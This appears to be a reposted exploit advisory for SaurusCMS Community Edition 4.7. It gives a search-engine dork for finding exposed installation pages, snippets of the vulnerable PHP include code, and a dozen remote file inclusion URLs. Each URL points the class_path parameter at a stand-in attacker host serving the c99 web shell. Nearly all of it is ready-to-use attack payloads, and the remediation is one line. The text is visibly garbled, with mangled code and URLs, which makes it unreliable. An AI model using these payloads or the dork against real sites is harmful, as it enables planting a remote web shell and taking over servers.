Title: SaurusCMS-CE (CommunityEdition) v4.7 Multiple Vulnerabilities
Author: KedAns-Dz www.2cto.com
Development Platform: php
Type: Multiple RFI
Test Platform: Windows XP SP3 (en)
: [Http://www.saurus.info/download/SaurusCMSCommunityEdition.zip]
# Gr33ts t0 {Kha & miX}
-------------------------------------------------------------------------
<+> (1) Installation File leakage:
-------------------------------------------------------------------------
+> Allintitle: "Saurus cms ce Installation"
+> Site: [www.2cto.com] allintitle: "Saurus cms ce Installation"
--------------------------------------------------------------------------
<+> (2) Multiple RFI:
--------------------------------------------------------------------------
[PHP Code (1) =>
$ Class_path = $ matches [1] = "editor "? "../Classes/": "./classes /";
Include ($ class_path. "port. inc. php ");
<= END Code]
Http://www.bkjia.com/[path]/file. php? Class_path = http: // Ev! L/c99.txt?
Http://www.bkjia.com/[path]/image. php? Class_path = http: // Ev! L/c99.txt?
Http://www.bkjia.com/[path]/doc. php? Class_path = http: // Ev! L/c99.txt?
Http://www.bkjia.com/[path]/com_del.php? Class_path = http: // Ev! L/c99.txt?
Http://www.bkjia.com/[path]/form. php? Class_path = http: // Ev! L/c99.txt?
Http://www.bkjia.com/[path]/editor/file. php? Class_path = http: // Ev! L/c99.txt?
Http://www.bkjia.com/[path]/editor/image. php? Class_path = http: // Ev! L/c99.txt?
Http://www.bkjia.com/[path]/editor/doc. php? Class_path = http: // Ev! L/c99.txt?
Http://www.bkjia.com/[path]/editor/com_del.php? Class_path = http: // Ev! L/c99.txt?
Http://www.bkjia.com/[path]/editor/form. php? Class_path = http: // Ev! L/c99.txt?
--------------------------------------------------------------------------
[PHP Code (2) =>
Include_once ($ class_path. "timer. class. php ");
If ($ debug ){
Include_once ($ class_path. "debug. inc. php ");
} Else {
Include_once ($ class_path. "nodebug. inc. php ");
}
Include_once ($ class_path. "config. class. php ");
<= END Code]
Http://www.bkjia.com/[path]/styles. php? Class_path = http: // Ev! L/c99.txt?
Http://www.bkjia.com/[path]/editor/styles. php? Class_path = http: // Ev! L/c99.txt?
--------------------------------------------------------------------------
Repair: targeted repair